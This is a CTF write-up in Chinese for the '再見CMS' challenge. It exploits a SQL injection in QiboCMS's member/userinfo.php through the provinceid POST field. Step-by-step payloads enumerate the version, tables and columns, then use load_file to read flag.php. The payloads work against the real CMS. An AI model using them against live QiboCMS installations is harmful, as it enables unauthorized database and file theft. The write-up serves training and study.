i春秋CTF-“百度杯”CTF比賽 九月場-再見CMS
1 資訊收集
拿到CMS搭的站, 首先需要確定網站使用的是何種CMS,百度得到該CMS為齊博CMS的整站系統:http://v7.qibosoft.com/
![11129189-0cd68cd24df113f7.png](https://i.iter01.com/images/5dca771f2f69a79c381b0cd7ba574676c5db97a2a2b149790da714e6a7a737dd.webp)
image
接下來,收集資訊,該CMS出現過哪些漏洞:
2 漏洞利用
簡而言之,治理在修改資訊時,有一個SQL隱碼攻擊漏洞。
接下來,我根據大佬的描述,寫payload,利用這個漏洞:
0- 註冊使用者,記一下uid和email
1-報錯測試:
url:
http://4acd6fb999684befb6f3dec5f31047d93fd33c52724f45b7.game.ichunqiu.com/member/userinfo.php?job=edit&step=2
# email 為註冊時的email
POST:
truename=xxxx%0000&Limitword[000]=&email=1111@qq.com&provinceid=
![11129189-b57a20fa0234a5ca.png](https://i.iter01.com/images/c49f047a4192568118dca0109f783bc2853224e27a9f810134b8537aa3bd7496.webp)
image
2-加上注入語句
url:
http://4acd6fb999684befb6f3dec5f31047d93fd33c52724f45b7.game.ichunqiu.com/member/userinfo.php?job=edit&step=2
POST data:
truename=xxxx%0000&Limitword[000]=&email=123456@qq.com&provinceid= , address=(select version()) where uid = 3 %23
![11129189-be7572b8bf5f48a8.png](https://i.iter01.com/images/14e42430b249721534d843d2375d3e0614e51c34a0282a0ef3b62315abab2bd7.webp)
image
3-查表:
POSTdata:
truename=xxxx%0000&Limitword[000]=&email=1111@qq.com&provinceid= , address=(select group_concat(table_name) from information_schema.tables where table_schema=database()) where uid = 3 %23
![11129189-c91943747b17a114.png](https://i.iter01.com/images/56a66400144ea06a0b1d427ad05591798e26d8fd8fc77f5566d78d46d5549c74.webp)
image
4-查列名
POSTdata:
truename=xxxx%0000&Limitword[000]=&email=1111@qq.com&provinceid=
, address=(select group_concat(distinct(column_name)) from information_schema.columns where table_name = (select distinct(table_name) from information_schema.tables where table_schema = database() limit 1) ) where uid = 3 %23
![11129189-97b0590f35cd5a9e.png](https://i.iter01.com/images/0d4370883ee21b509ec7726001db3180fff7e8d5e91dce556adf389101160531.webp)
image
但是沒有直接的flag,只能考慮利用load_file
5-payload
掃描一下發現,網站更目錄下,有一個flag.php
![11129189-28d3eb5822747f9b.png](https://i.iter01.com/images/2e6004f1ac92c64e22766f563fa8b9bb9426692c2035ee7281be141c9674911e.webp)
image
load_file函式讀取這個檔案:/var/www/html/flag.php
truename=xxxx%0000&Limitword[000]=&email=1111@qq.com&provinceid=
, address=(select load_file(0x2f7661722f7777772f68746d6c2f666c61672e706870) ) where uid = 3 %23
![11129189-e7c4b47ef19142f2.png](https://i.iter01.com/images/7a3857e4c8459d05f1d6e3a73e8d2012c90fc661764238099c1228e0e5f76749.webp)
image
相關文章
- “百度杯”CTF比賽 九月場-Upload
- "百度杯"CTF比賽 十月場——EXEC
- “百度杯”CTF比賽 2017 二月場-爆破-3
- i春秋 第二屆春秋歡樂賽-Hello-World
- 2024春秋杯網路安全聯賽夏季賽-PWN-Writeup
- CTF-記憶體取證題目記憶體
- 2021年春秋杯網路安全聯賽秋季賽 勇者山峰部分wp
- 再見!百度防毒......防毒
- 第十一屆藍橋杯省賽CC++組第二場比賽C++
- 2018九月你好唯美句子大全 八月再見,九月你好朋友圈說說
- 【i春秋】linux常用的命令(筆記)Linux筆記
- 技術分享 | "錦行杯"比賽 Writeup
- 今日開賽 | 百度杯白帽眾測團戰賽
- 當經典CTF遇上“全棧”雲環境,這場比賽到底有多刺激?!全棧
- 恭喜看雪CTF戰隊在護網杯預選賽 取得第8名!
- 藍橋杯第9場小白入門賽
- 百度杯白帽眾測團戰賽 | We are the champion
- CTF_復現(部分) | _XGCTF_西瓜杯GC
- 百度杯全域眾測挑戰賽 | 珍惜春光 勤勉挖洞
- 碼蹄杯第三場專科賽道vp
- 記一次CTF比賽過程與解題思路-MISC部分
- 【比賽覆盤】2024第七屆“傳智杯”全國大學生計算機大賽程式設計挑戰賽(初賽第一場)計算機程式設計
- 逆向ctf-2020湖湘杯Re_03
- 2019-360ctf-初賽pwn
- Tron_CTF2024新生賽 WEBTF2Web
- Tron_CTF2024新生賽 MISCTF2
- 職場<火焰杯>測試開發大賽決賽即將開始!
- 根據四萬場比賽結果,我給今年世界盃每場比賽計算了勝率
- ctf常見原始碼洩露原始碼
- CTF常見密碼彙總密碼
- 常見人工智慧比賽平臺總結人工智慧
- 2019-東華杯&2019-360ctf__PWN題解
- 再見2018
- 再見,2019
- 再見,Eclipse。Eclipse
- 2018再見!
- 再見,CommonsChunkPluginPlugin
- 再見2022